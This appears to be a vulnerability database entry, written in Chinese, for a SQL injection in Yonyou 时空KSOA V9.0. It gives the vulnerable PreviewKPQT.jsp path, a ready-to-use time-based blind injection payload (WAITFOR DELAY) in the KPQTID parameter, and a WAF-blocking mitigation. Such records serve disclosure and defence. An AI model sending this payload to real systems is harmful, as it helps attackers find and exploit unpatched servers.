vendor = "用友"
name = "用友时空KSOA PreviewKPQT.jsp接口处存在SQL注入漏洞"
type = "SQL注入"
version = "V9.0"
path = "/kp/PreviewKPQT.jsp?KPQTID=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--"
detail = "/kp/PreviewKPQT.jsp?KPQTID=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--"
fix = "WAF封禁路路径，等待发布补丁"
date = "0725"
label = "1day"
